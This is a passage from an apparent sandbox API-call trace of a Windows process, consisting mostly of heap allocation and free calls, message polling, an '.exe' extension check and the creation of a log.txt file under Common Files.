dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0167.696] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.696] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0167.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.697] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.699] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.699] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.701] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.702] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0167.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0167.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x8feba8 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0167.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0167.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.706] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0167.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0167.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 